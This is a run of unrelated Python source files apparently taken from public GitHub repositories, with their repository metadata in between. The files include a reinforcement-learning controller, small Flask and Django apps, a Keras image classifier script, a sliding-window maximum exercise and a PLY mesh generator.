def setPolicyParam(self, q_func=None, R=None, phi_func=None, psi_func=None, u0=lambda x: 0, data_eval=0.1, num_data=10, explore_noise=lambda t: 2*np.sin(100*t)):
    """Setup policy parameters for both the On (Off) policy algorithms and initialize the Wa, Wc loggers.

    Args:
        q_func (func(x), optional): the state cost q(x). Defaults to NonLinController.default_q_func.
        R (mxm array, optional): input weight matrix. Defaults to identity.
        phi_func (func(x), optional): critic basis functions. Defaults to NonLinController.default_phi_func.
        psi_func (func(x), optional): actor basis functions. Defaults to NonLinController.default_psi_func.
        u0 (func(x), optional): the initial feedback control policy. Defaults to 0.
        data_eval (float, optional): data_eval x num_data = time interval for each policy update. Defaults to 0.1.
        num_data (int, optional): the number of data windows per learning iteration. Defaults to 10.
        explore_noise (func(t), optional): exploration noise used while learning. Defaults to lambda t: 2*np.sin(100*t).

    Note:
        - u0 must be an admissible controller
        - the basis sequences phi_j(x), psi_j(x) should be linearly independent and smooth
        - data_eval must be larger than the sample_time
        - num_data >= n(n+1) + 2mn
    """
    # Bug fix: the original tested `if R == None:`. When R is an ndarray that is an
    # ELEMENTWISE comparison, and `if` on the resulting boolean array raises
    # "truth value of an array is ambiguous" for any user-supplied R with more than
    # one element. `is None` is the intended identity check; same fix applied to all
    # four optional parameters for consistency.
    if q_func is None:
        self.q_func = NonLinController.default_q_func
    else:
        self.q_func = q_func  # positive definite function
    if R is None:
        self.R = np.eye(self.system.dimension[1])
    else:
        self.R = R  # symmetric and positive definite matrix (m x m)
    if phi_func is None:
        self.phi_func = NonLinController.default_phi_func
    else:
        self.phi_func = phi_func  # basis functions for the value function (critic)
    if psi_func is None:
        self.psi_func = NonLinController.default_psi_func
    else:
        self.psi_func = psi_func  # basis functions for the policy (actor)
    self.u0 = u0
    self.data_eval = data_eval
    self.num_data = num_data
    self.explore_noise = explore_noise
    self.logWa = Logger(self.log_dir)
    self.logWc = Logger(self.log_dir)
def step(self, dot_x, x0, t_span):
    """Integrate the (already closed-loop) dynamics dot_x(t, x) from x0 over t_span.

    Args:
        dot_x (callable): right-hand side f(t, x) of the ODE, input already folded in.
        x0 (1D array): the initial state.
        t_span (tuple): (t_start, t_stop).

    Returns:
        (1D array, 2D array): solver time points and states at them (rows are time points).
    """
    solution = integrate.solve_ivp(fun=dot_x, t_span=t_span, y0=x0,
                                   method=self.system.algo,
                                   max_step=self.system.max_step,
                                   dense_output=True)
    return solution.t, solution.y.T
def feedback(self, viz=True):
    """Simulate the system under the initial (unlearned) policy u0 to check its stability.

    Args:
        viz (bool, optional): True to log the trajectory to Tensorboard. Defaults to True.

    Returns:
        (array, 2D array): time points and states of the unlearned closed-loop trajectory
        (also stored as self.t_plot_unlearn / self.x_plot_unlearn).
    """
    self.viz = viz
    x_plot = [self.system.x0]
    t_plot = [self.system.t_sim[0]]
    self.t_plot_unlearn, self.x_plot_unlearn = self._unlearn_controller(t_plot.copy(), x_plot.copy(), 'states_unlearned')
    # Fix: the docstring promised (t_plot, x_plot) but the original returned None.
    # Returning the stored trajectories is backward-compatible for callers that
    # ignored the result.
    return self.t_plot_unlearn, self.x_plot_unlearn
def offPolicy(self, stop_thres=1e-3, max_iter=30, viz=True):
"""Using Off-policy approach to find optimal adaptive feedback controller, requires only the dimension of the system
Args:
stop_thres (float, optional): threshold value to stop iteration. Defaults to 1e-3.
viz (boolean): True for visualize results on ``Tensorboard``. Default to True
max_iter (int, optional): the maximum number of policy iterations. Defaults to 30.
Returns:
array, array: the final updated weights of the critic and actor neural nets.
"""
self.viz = viz
self.stop_thres = stop_thres
self.max_iter = max_iter
# collect data
# behavior policy: the initial admissible policy u0 plus exploration noise
u = lambda t,x: self.u0(x) + self.explore_noise(t)
dot_x = lambda t,x: self.dot_x(t, x, u(t,x))
x_plot = [self.system.x0]
t_plot = [self.system.t_sim[0]]
dphi = []
Iq = []
Iupsi = []
Ipsipsi = []
for i in range(self.num_data):
x_sample = [x_plot[-1]]
t_sample = [t_plot[-1]]
t_collect = t_plot[-1]
while t_plot[-1] < t_collect + self.data_eval:
t_span = (t_plot[-1], t_plot[-1] + self.system.sample_time)
t_temp, x_temp = self.step(dot_x, x_plot[-1], t_span)
if self.viz:
self.logX.log('states_offPolicy', x_temp[-1], int(t_temp[-1]/self.system.sample_time))
t_sample.append(t_temp[-1])
x_sample.append(x_temp[-1])
# NOTE(review): the stray trailing comma below is harmless (builds a discarded tuple)
x_plot.extend(x_temp[1:].tolist()),
t_plot.extend(t_temp[1:].tolist())
dphi_, Iq_, Iupsi_, Ipsipsi_ = self._getRowOffPolicyMatrix(np.array(t_sample), np.array(x_sample))
dphi.append(dphi_)
Iq.append(Iq_)
Iupsi.append(Iupsi_)
Ipsipsi.append(Ipsipsi_)
# solve policy
save_Wc, save_Wa = self._policyEval(np.array(dphi), np.array(Iq), np.array(Iupsi), np.array(Ipsipsi))
Waopt = save_Wa[-1]
# finish the simulation to t_sim[1] under the learned actor, without exploration noise
self.t_plot, self.x_plot = self._afterGainWopt(t_plot.copy(), x_plot.copy(), Waopt, 'states_offPolicy')
return save_Wc[-1], save_Wa[-1]
def _unlearn_controller(self, t_plot, x_plot, section):
    """Simulate the closed loop under the initial policy u0 until t_sim[1], logging states."""
    policy = lambda t, x: self.u0(x)
    rhs = lambda t, x: self.dot_x(t, x, policy(t, x))
    dt = self.system.sample_time
    steps = int((self.system.t_sim[1] - t_plot[-1]) / dt)
    for _ in range(steps):
        t_step, x_step = self.step(rhs, x_plot[-1], (t_plot[-1], t_plot[-1] + dt))
        if self.viz:
            self.logX.log(section, x_step[-1], int(t_step[-1] / self.system.sample_time))
        t_plot.extend(t_step[1:].tolist())
        x_plot.extend(x_step[1:].tolist())
    return np.array(t_plot), np.array(x_plot)
def _afterGainWopt(self, t_plot, x_plot, Waopt, section):
    """Simulate the closed loop under the learned actor u(x) = Waopt.psi(x) until t_sim[1]."""
    policy = lambda t, x: Waopt.dot(self.psi_func(x))
    rhs = lambda t, x: self.dot_x(t, x, policy(t, x))
    dt = self.system.sample_time
    steps = int((self.system.t_sim[1] - t_plot[-1]) / dt)
    for _ in range(steps):
        t_step, x_step = self.step(rhs, x_plot[-1], (t_plot[-1], t_plot[-1] + dt))
        if self.viz:
            self.logX.log(section, x_step[-1], int(t_step[-1] / self.system.sample_time))
        t_plot.extend(t_step[1:].tolist())
        x_plot.extend(x_step[1:].tolist())
    return np.array(t_plot), np.array(x_plot)
def _policyEval(self, dphi, Iq, Iupsi, Ipsipsi):
"""Off-policy actor-critic iteration: alternately solve the critic weights Wc and the
actor weights Wa from the collected data matrices until Wc converges or max_iter.
Returns (save_Wc, save_Wa), the weight histories."""
n_psi = len(self.psi_func(self.system.x0))
n_phi = len(self.phi_func(self.system.x0))
n_input = self.system.dimension[1]
# actor weights start at zero; the data was generated by u0, not by Wa
Wa = np.zeros((n_input, n_psi))
save_Wc = []
save_Wa = [Wa]
for i in range(self.max_iter):
temp = -2*(Iupsi - Ipsipsi.dot(np.kron(Wa.T, np.eye(n_psi))))
A = np.hstack((dphi, temp))
B = Iq + Ipsipsi.dot(Wa.T.dot(self.R.dot(Wa)).flatten())
# least-squares solve for the stacked unknowns [critic weights; R-weighted actor weights]
Wca = np.linalg.pinv(A).dot(B)
Wc = -Wca[:n_phi] # because u = Wa*psi not = -Wa*psi
if self.viz:
self.logWc.log('offPolicy_Wc', Wc, i)
self.logWa.log('offPolicy_Wa', Wa, i)
try:
# needs two Wc iterates; the IndexError on the first two passes is swallowed on purpose
err = np.linalg.norm(save_Wc[-1] - save_Wc[-2], ord=2)
if err < self.stop_thres:
break
except: pass
Wa = Wca[n_phi:].reshape((n_input, n_psi)).T.dot(np.linalg.inv(self.R)).T
save_Wc.append(Wc)
save_Wa.append(Wa)
return save_Wc, save_Wa
def _getRowOffPolicyMatrix(self, t_sample, x_sample):
dphi_ = self.phi_func(x_sample[-1]) - self.phi_func(x_sample[0])
Iq_ = []
Iupsi_ = []
Ipsipsi_ = []
u = lambda t,x: self.u0(x) + self.explore_noise(t)
for i, xi in enumerate(x_sample):
Iq_.append(self.q_func(xi))
Iupsi_.append(np.kron(u(t_sample[i], xi), self.psi_func(xi)))
Ipsipsi_.append(np.kron(self.psi_func(xi), self.psi_func(xi)))
Iq_ = integrate.simpson(Iq_, t_sample, axis=0)
Iupsi_ = integrate.simpson(Iupsi_, t_sample, axis=0)
Ipsipsi_ = integrate.simpson(Ipsipsi_, t_sample, axis=0)
return dphi_, Iq_, Iupsi_, Ipsipsi_
@staticmethod
def default_psi_func(x):
    """Default actor basis: each state x_i followed by all degree-3 monomials x_i x_j x_k (i<=j<=k).

    For x = [x1, x2] this yields [x1, x1^3, x1^2 x2, x1 x2^2, x2, x2^3].

    Args:
        x (1D array): the state vector.

    Returns:
        1D array: the basis functions evaluated at x.
    """
    n = len(x)
    psi = []
    for i in range(n):
        psi.append(x[i])
        psi.extend(x[i] * x[j] * x[k] for j in range(i, n) for k in range(j, n))
    return np.array(psi)
@staticmethod
def default_phi_func(x):
    """Default critic basis: for each index pair i<=j, the monomials x_i x_j and x_i^2 x_j^2.

    For x = [x1, x2] this yields [x1^2, x1^4, x1 x2, x1^2 x2^2, x2^2, x2^4].

    Args:
        x (1D array): the state vector.

    Returns:
        1D array: the basis functions evaluated at x.
    """
    n = len(x)
    phi = [term
           for i in range(n)
           for j in range(i, n)
           for term in (x[i] * x[j], x[i] ** 2 * x[j] ** 2)]
    return np.array(phi)
@staticmethod
def default_q_func(x):
    """Default state cost q(x) = x^T x.

    Args:
        x (1D array): the state vector.

    Returns:
        float: the squared Euclidean norm of x.
    """
    return np.sum(np.square(x), axis=0)
| [
"phi9b2@gmail.com"
] | phi9b2@gmail.com |
64b4de116e876e8f8baee0b128e9758022e58b5c | ba1c0a7a17cce2a3c1bd04c8a1546f74eb8007c1 | /app2.py | 92a2f10681ff2f7043927d30f66226e91ee22407 | [] | no_license | syedhaziq/ML-and-Docker | 5dd04dacff493251d9a9bd09720a2ae83746d1ba | 05346554333f72258f173635a5aafb264e08e30a | refs/heads/main | 2023-02-01T08:43:10.198863 | 2020-12-20T10:26:28 | 2020-12-20T10:26:28 | 323,042,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,407 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Dec 19 18:54:00 2020
@author: syed_
"""
from flask import Flask, request
import numpy as np
import pandas as pd
import pickle
import flasgger
from flasgger import Swagger
app= Flask(__name__)
Swagger(app)
pickle_in = open("classifier.pkl","rb")
classifier=pickle.load(pickle_in)
@app.route('/')
def welcome():
    """Landing endpoint: plain-text greeting confirming the service is up."""
    greeting = "Welcome All"
    return greeting
@app.route('/predict',methods=["Get"])
def predict_note_authentication():
    """Let's Authenticate the Banks Note
    This is using docstrings for specifications.
    ---
    parameters:
      - name: variance
        in: query
        type: number
        required: true
      - name: skewness
        in: query
        type: number
        required: true
      - name: curtosis
        in: query
        type: number
        required: true
      - name: entropy
        in: query
        type: number
        required: true
    responses:
        200:
            description: The output values
    """
    # Query-string values arrive as strings; the model expects numeric features,
    # so cast each one to float before building the 1x4 feature row (the original
    # passed the raw strings straight into classifier.predict).
    variance = float(request.args.get("variance"))
    skewness = float(request.args.get("skewness"))
    curtosis = float(request.args.get("curtosis"))
    entropy = float(request.args.get("entropy"))
    prediction = classifier.predict([[variance, skewness, curtosis, entropy]])
    print(prediction)
    return "Hello The answer is" + str(prediction)
# Start the development server only when this file is executed directly, not when
# it is imported (e.g. by a WSGI server or a test harness).
if __name__ == '__main__':
    # NOTE(review): debug=True enables the interactive debugger -- disable in production.
    app.run(debug=True)
| [
"noreply@github.com"
] | syedhaziq.noreply@github.com |
11883620c854fbaff19053d4596bac78d2611631 | 2f85a88c5862a4998a1b80262c4184d3c2dc1a7c | /userauthprac/manage.py | 0f112fe6e1c7da16c32381e605b07ec01807996d | [] | no_license | Tareq69/Django-Practice | 7fe21584dfe93fd548099564062cc7eec71174da | e042b80f212e332761c91078cb90e90aa2d575b1 | refs/heads/main | 2023-06-28T14:46:04.746749 | 2021-08-05T07:16:47 | 2021-08-05T07:16:47 | 365,340,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'userauthprac.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"mtareq880@gmail.com"
] | mtareq880@gmail.com |
14bca9642d96aeb5c316144e0cbd896b89f4215a | 3c66d322842f1b39edce07f54f6a9d54a7609e05 | /pic_predict.py | fe1627c800a301628ff7c681ef3057a5e9a16071 | [] | no_license | fdelia/YoN-game | 9b81cd66ee3ff01ef3d6a3de9a0cd6b7e7b503ad | ec428e929a71bd52a94d163f3017106ad4682736 | refs/heads/master | 2019-07-11T19:42:09.832983 | 2017-05-21T15:00:21 | 2017-05-21T15:00:21 | 91,965,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,111 | py | import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
from keras.models import load_model
import cv2
import numpy as np
new_data_dir = 'Pictures/new/'
predicted_data_dir = 'Pictures/predicted/'
MOVE = True
img_width, img_height = 200, 200
model = load_model('model.h5')
model.compile(loss='binary_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
def predict_image(name):
img = cv2.imread(new_data_dir + name)
if img is None: return False
img = cv2.resize(img,(img_width, img_height))
img = np.reshape(img,[1, img_width, img_height, 3])
return model.predict(img)[0][0]
# for every image in /new
files = [f for f in os.listdir(new_data_dir) if os.path.isfile(os.path.join(new_data_dir, f))]
for f in files:
if f[0] == '.': continue
prediction = predict_image(f)
if prediction < 0.5:
print f + ' --> no'
if MOVE: os.rename(os.path.join(new_data_dir, f), os.path.join(predicted_data_dir + 'no/', f))
else:
print f + ' --> yes'
if MOVE: os.rename(os.path.join(new_data_dir, f), os.path.join(predicted_data_dir + 'yes/', f))
# if class = 0 -> /no, else /yes
| [
"fabio_d@gmx.net"
] | fabio_d@gmx.net |
6ccd00459fa87e1a94f5758411d0bbdb9aec6367 | a884039e1a8b0ab516b80c2186e0e3bad28d5147 | /Livros/Livro-Desenvolvimento web com Flask/Capitulo04/Nível 01/exemplo4_3.py | a387fdd0382fcffe143985b37b25f2d588a471a9 | [
"MIT"
] | permissive | ramonvaleriano/python- | 6e744e8bcd58d07f05cd31d42a5092e58091e9f0 | ada70918e945e8f2d3b59555e9ccc35cf0178dbd | refs/heads/main | 2023-04-10T14:04:24.497256 | 2021-04-22T18:49:11 | 2021-04-22T18:49:11 | 340,360,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,213 | py | # Program: exemplo4_3.py
# Author: Ramon R. Valeriano
# Description: Fazendos os programas do Capítulo 04, do nível 01
# Developed: 09/03/2020 - 14:48
from flask import Flask, render_template
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
app = Flask(__name__)
app.config['SECRET_KEY'] = 'testandoaplicacao'
bootstrap = Bootstrap(app)
moment = Moment(app)
class NameForm(FlaskForm):
name = StringField('Qual é seu nome?', validators=[DataRequired()])
submit = SubmitField('Submeter')
@app.route('/', methods=['GET', 'POST'])
def index():
name = None
form = NameForm()
if form.validate_on_submit():
name = form.name.data
form.name.data = ''
return render_template('indexInicial1.html', form=form, name=name)
@app.route('/user/<name>')
def user(name):
return render_template('userInicial.html', name=name)
@app.errorhandler(404)
def pagina_nao_encontrada(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def erro_servidor(e):
return render_template('500.html'), 500
app.run(debug=True) | [
"rrvaleriano@gmail.com"
] | rrvaleriano@gmail.com |
6230ddcb42088e0000d651b5223cc77582889a0f | 53debe9ffc8902390f1f6e223f6271429717065c | /myfirstwebsite/urls.py | d2bf60f2c90e2f4970ced134c6d23df4023e6f63 | [] | no_license | prakashme333/portfoliofinal | c5a9cc78d6404172f5531c630ab8074c5574a802 | a5bd32b33e9ce8e183d9cdccd202fcd8ffe45aca | refs/heads/master | 2023-06-04T07:28:33.368734 | 2021-06-14T15:03:58 | 2021-06-14T15:03:58 | 376,794,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 969 | py | """myfirstwebsite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from portfolio import views
from blog import views as blogview
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.homepage,name="homepage"),
path('blog/', blogview.forblog, name="blog"),
path('<int:id>/',blogview.detail, name="detail")
]
| [
"prakash.me333@gmail.com"
] | prakash.me333@gmail.com |
e0b621639cfd7dcfd8faffc877ce2854923c217a | 3e58aa3b1728dac3ca1f524ad412581216cb8ac4 | /EVFutureEmissionCalculator.py | 60628997545abcba032e7be4681f22621ac02dfb | [] | no_license | ascourtas/EV-cobenefit-calculator | 5cad38da5c0a54a55a46afecce320bde359fef25 | 6cef30fc7f199675190fdbc34c9f65f004d3643f | refs/heads/main | 2023-01-10T11:55:49.691314 | 2020-11-11T02:09:56 | 2020-11-11T02:09:56 | 311,831,205 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,834 | py | import xlrd #allows for reading from excel
import matplotlib.pyplot as plt #allows for creating figures within python
import numpy as np #allows for higher level math functions
import seaborn as sns #makes figures more organized
sns.set() #apply seaborn basics
# TODO: remove all absolute paths
AZNM = xlrd.open_workbook('/projects/b1045/EVTool/AZNM.xlsx') #files with future data for each type of power generation by egrid
CAMX = xlrd.open_workbook('/projects/b1045/EVTool/CAMX.xlsx')
ERCT = xlrd.open_workbook('/projects/b1045/EVTool/ERCT.xlsx')
FRCC = xlrd.open_workbook('/projects/b1045/EVTool/FRCC.xlsx')
MROE = xlrd.open_workbook('/projects/b1045/EVTool/MROE.xlsx')
MROW = xlrd.open_workbook('/projects/b1045/EVTool/MROW.xlsx')
NEWE = xlrd.open_workbook('/projects/b1045/EVTool/NEWE.xlsx')
NWPP = xlrd.open_workbook('/projects/b1045/EVTool/NWPP.xlsx')
NYCW = xlrd.open_workbook('/projects/b1045/EVTool/NYCW.xlsx')
NYLI = xlrd.open_workbook('/projects/b1045/EVTool/NYLI.xlsx')
SRVC = xlrd.open_workbook('/projects/b1045/EVTool/SRVC.xlsx')
NYUP = xlrd.open_workbook('/projects/b1045/EVTool/NYUP.xlsx')
RFCE = xlrd.open_workbook('/projects/b1045/EVTool/RFCE.xlsx')
RFCM = xlrd.open_workbook('/projects/b1045/EVTool/RFCM.xlsx')
RFCW = xlrd.open_workbook('/projects/b1045/EVTool/RFCW.xlsx')
RMPA = xlrd.open_workbook('/projects/b1045/EVTool/RMPA.xlsx')
SPNO = xlrd.open_workbook('/projects/b1045/EVTool/SPNO.xlsx')
SPSO = xlrd.open_workbook('/projects/b1045/EVTool/SPSO.xlsx')
SRMV = xlrd.open_workbook('/projects/b1045/EVTool/SRMV.xlsx')
SRMW = xlrd.open_workbook('/projects/b1045/EVTool/SRMW.xlsx')
SRSO = xlrd.open_workbook('/projects/b1045/EVTool/SRSO.xlsx')
SRTV = xlrd.open_workbook('/projects/b1045/EVTool/SRTV.xlsx')
enter = input('what is your zip code? ') #prompts with these questions for inputs to be used in calculations
startyear = input('what year do you plan on starting to own the vehicle? ')
endyear = input('when do you plan to stop owning the vehicle? ')
global startEnter
global endEnter
def getgrid(): #defines function
vList = [] #opens list to be appended to later
zipGrids = xlrd.open_workbook('/projects/b1045/EVTool/zipGrid.xlsx') #defines variable for a file with all zip codes and grids
sheet = zipGrids.sheet_by_index(4) #chooses the propper sheet within the excel file with the data we want
for row_num in range(sheet.nrows): #for a particular row in the set of all zip codes in the continental us
row_value = sheet.row_values(row_num) #narrows search down to row by row
if row_value[1] == int(enter): #if the value of the first column in a given row is equal to zip code input
global eGRID
eGRID = row_value[3] #variable eGRID is set for the third column value in that row
energyCalc = xlrd.open_workbook('/projects/b1045/EVTool/energyCalculations.xlsx') #defines variable for file with total co2
#and kWh in every grid
carbonDioxCalc = energyCalc.sheet_by_index(0) #chooses correct sheet within excel file
global COTotal
for row_num2 in range(carbonDioxCalc.nrows): #for a particular row in the energy calc excel sheet
row_value2 = carbonDioxCalc.row_values(row_num2) #narrows down to particular rows again
if row_value2[1] == eGRID: #if the value of the first column equals the grid from the zipGrids file
global COtotal
COtotal = row_value2[4] #total CO2 of this grid is the 5th column
global kwhtotal
kwhtotal=row_value2[5] #total kWh of this grid is the 6th column
timeSheet = xlrd.open_workbook('/projects/b1045/EVTool/'+eGRID+'.xlsx') #open the excel file that corresponds to the correct grid
sheetTwo = timeSheet.sheet_by_index(0) #chooses correct sheet in the eGRID excel file
theirStart = 2018 #these variables set the extremes of the years possible for our function to consider
theirEnd = 2051
while True: #sets the boundaries of the calculation
for startRow in range(sheetTwo.nrows):
startDateRow = sheetTwo.row_values(startRow) #
if startDateRow[1] == theirStart:
yearFuture = sheetTwo.row_values(rowx=-theirStart + 2052)
global COpercentage
COpercentage = ((startDateRow[2] * 95.6191) + (startDateRow[4] * 53.06) + (startDateRow[3] * 74.57193) + (.1126 * startDateRow[5] * 52.04))/((yearFuture[2] * 95.6191) + (yearFuture[4] * 53.06) + (yearFuture[3] * 74.57193) + (.1126 * yearFuture[5] * 52.04))
kwhpercentage = startDateRow[6]/yearFuture[6]
COtotal = COtotal * COpercentage
kwhtotal = kwhtotal * kwhpercentage
factor = COtotal/kwhtotal
kmyear = (18724.27 * 0.995 ** (theirStart-2019))
vList.append(factor*kmyear*0.1988*2.205)
theirStart += 1
if theirStart >= theirEnd:
break
return vList
valueList = getgrid()
finalelectric = np.sum(valueList[int(startyear)-2017:int(endyear)-2017])
finalhybrid = 6258 * (int(endyear)-int(startyear))
finalicev = 11435 * (int(endyear)-int(startyear))
finalplugin = ((finalelectric*.55*1.146875)+(.45*.6412*finalicev))
x_pos = ['Electric Vehicle', 'Hybrid Plug-in', 'Hybrid Gasoline', 'Gasoline Vehicle']
y_value = [finalelectric, finalplugin, finalhybrid, finalicev]
plt.bar(x_pos, y_value, color=(0, 0.38, 0.11, 1))
plt.xlabel("Car Type")
plt.ylabel("lbs of CO2 Equivalent")
plt.title("Total CO2 Emissions by Car Type in eGrid: " + eGRID)
plt.xticks(x_pos, x_pos)
plt.show()
print('the total amount of CO2 emissions from an electric car is '+str(finalelectric)+' pounds')
average = finalelectric/(int(endyear)-int(startyear))
print('The average per year is: '+str(average))
| [
"ascourtas@gmail.com"
] | ascourtas@gmail.com |
fddec0380f79ff6f5f668034a225ffab068a77d0 | 904fc202ae30942c561767369ea0783ec7fb20c7 | /challenge18.py | 6e72200b236c23f081f2b1c2d15b6dbf6a53ab83 | [] | no_license | TetianaHrunyk/DailyCodingProblems | 92004878f5857c6ced79825abfcff0e2bdef45f7 | c2a97ffd700db18ba4e5383fc3f0c8abbff79140 | refs/heads/master | 2021-04-01T15:45:55.030351 | 2020-08-15T17:20:56 | 2020-08-15T17:20:56 | 248,197,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,158 | py | """
Given an array of integers and a number k, where 1 <= k <= length
of the array, compute the maximum values of each subarray of length k.
For example, given array = [10, 5, 2, 7, 8, 7] and k = 3,
we should get: [10, 7, 8, 8], since:
10 = max(10, 5, 2)
7 = max(5, 2, 7)
8 = max(2, 7, 8)
8 = max(7, 8, 7)
Do this in O(n) time and O(k) space.
You can modify the input array in-place and you do not need to store
the results. You can simply print them out as you compute them.
"""
def LocalMax(a: list, k: int) -> list:
assert k > 0
max_vals = []
for i in range(len(a)):
sub_arr = a[i:i+k]
#print("Sub arr: ",sub_arr)
if len(sub_arr) < k:
break
max_vals.append(max(sub_arr))
#print("Max: ", max_vals)
return max_vals
if __name__ == '__main__':
assert LocalMax([10, 5, 2, 7, 8, 7], 3) == [10, 7, 8, 8]
assert LocalMax([10, 5, 2, 7, 8, 7], 1) == [10, 5, 2, 7, 8, 7]
assert LocalMax([10, 5, 2, 7, 8, 7], 4) == [10, 8, 8]
assert LocalMax([10, 5, 2, 7, 8, 7], 6) == [10]
assert LocalMax([2, 2, 2, 2, 2, 2], 5) == [2, 2]
| [
"tetiana.hrunyk@gmail.com"
] | tetiana.hrunyk@gmail.com |
01d2714cb72201a6a3dcb168ef90fd6bd0a8160c | 57c3524619b41e22ad3d3b2bd312f2653a9f3e68 | /movies/app/migrations/0006_user.py | 6efc19958e70702535055373e372aa4bf0322aa4 | [] | no_license | xin17863935225/MoviesProject | 8208c9836863c07300d6ed466b0c5303ca938eb0 | f494bb6e0ae36f306f4c3ddf205eebd7646ae7f2 | refs/heads/master | 2020-04-07T16:32:41.449264 | 2018-11-21T10:50:16 | 2018-11-21T10:50:16 | 158,532,980 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 999 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-11-19 09:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0005_auto_20181118_1954'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=32, unique=True)),
('password', models.CharField(max_length=32)),
('email', models.CharField(max_length=64, unique=True)),
('sex', models.BooleanField(default=True)),
('age', models.IntegerField(default=18, max_length=3)),
('icon', models.ImageField(upload_to='upload/')),
],
options={
'db_table': 'mv_user',
},
),
]
| [
"m17863935225@163.com"
] | m17863935225@163.com |
c5b012fede4462a7d9326e5a44e1ac78b9302ac0 | ab9b0e4df4149942b35f794e42080e93a07acc75 | /RayTracer/WriteArrayOfTriangles.py | 356273439476ca217c6c2d9488c906b2e71f0a76 | [] | no_license | cortana101/RayTracer | a08ffeffec398382bc5cb92e5b0e402fd0a52356 | 240c9ac238cb99c0b442a7fe86367be7db1e663b | refs/heads/master | 2021-01-18T16:29:51.980516 | 2014-07-25T16:55:09 | 2014-07-25T16:55:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,800 | py | #Creates a set of 4-sided cones in a 3D array
triangleHeight = 1.0
triangleWidth = 1.0
triangleFaceFormat = "3 {0} {1} {2}\n"
numTriX = 10
numTriY = 10
numTriZ = 10
startingZ = 4.0
triSpacing = 2.0
class vertex:
x = 0.0
y = 0.0
z = 0.0
def getVertexString(self):
return "{0} {1} {2}\n".format(self.x, self.y, self.z)
class triangle:
def __init__(self, topx, topy, topz):
self.top = vertex()
self.top.x = topx
self.top.y = topy
self.top.z = topz
def getVertices(self):
vertices = [self.top]
v1,v2,v3,v4 = vertex(), vertex(), vertex(), vertex()
v1.y = self.top.y - triangleHeight
v2.y = self.top.y - triangleHeight
v3.y = self.top.y - triangleHeight
v4.y = self.top.y - triangleHeight
v1.x = self.top.x - triangleWidth / 2
v2.x = self.top.x - triangleWidth / 2
v3.x = self.top.x + triangleWidth / 2
v4.x = self.top.x + triangleWidth / 2
v1.z = self.top.z - triangleWidth / 2
v2.z = self.top.z + triangleWidth / 2
v3.z = self.top.z + triangleWidth / 2
v4.z = self.top.z - triangleWidth / 2
vertices.append(v1)
vertices.append(v2)
vertices.append(v3)
vertices.append(v4)
return vertices
def getVertexIndiciesList(self, triangleProperties, triangleCount):
startingIndex = triangleCount * 5
faces = triangleProperties + triangleFaceFormat.format(startingIndex, startingIndex + 1, startingIndex + 2)
faces += triangleProperties + triangleFaceFormat.format(startingIndex, startingIndex + 2, startingIndex + 3)
faces += triangleProperties + triangleFaceFormat.format(startingIndex, startingIndex + 3, startingIndex + 4)
faces += triangleProperties + triangleFaceFormat.format(startingIndex, startingIndex + 1, startingIndex + 4)
faces += triangleProperties + triangleFaceFormat.format(startingIndex + 1, startingIndex + 2, startingIndex + 3)
faces += triangleProperties + triangleFaceFormat.format(startingIndex + 1, startingIndex + 3, startingIndex + 4)
return faces
def PrintHeader(outputFile, triangleList):
outputFile.write("ply\n")
outputFile.write("format ascii 1.0\n")
#each triangle cone has 5 vertices
outputFile.write("element vertex {0}\n".format(len(triangleList) * 5))
outputFile.write("property float32 x\n")
outputFile.write("property float32 y\n")
outputFile.write("property float32 z\n")
#each triangle cone has 6 faces
outputFile.write("element triangle {0}\n".format(len(triangleList) * 6))
outputFile.write("property float32 colorR\n")
outputFile.write("property float32 colorG\n")
outputFile.write("property float32 colorB\n")
outputFile.write("property float32 gloss\n")
outputFile.write("property list uchar int vertex_indices\n")
outputFile.write("end_header\n")
triangleList = []
for x in range(numTriX):
for y in range(numTriY):
for z in range(numTriZ):
xOffset = -((numTriX * triSpacing) / 2) + x * triSpacing
yOffset = -((numTriY * triSpacing) / 2) + y * triSpacing
zOffset = startingZ + z * triSpacing
newTriangle = triangle(xOffset, yOffset, zOffset)
triangleList.append(newTriangle)
print("writing to file")
with open("arrayOfTriangles.ply", "w") as triFile:
PrintHeader(triFile, triangleList)
for tri in triangleList:
for v in tri.getVertices():
triFile.write(v.getVertexString())
for t in triangleList:
triangleProperties = "200 100 200 500.0 "
triFile.write(t.getVertexIndiciesList(triangleProperties, triangleList.index(t)))
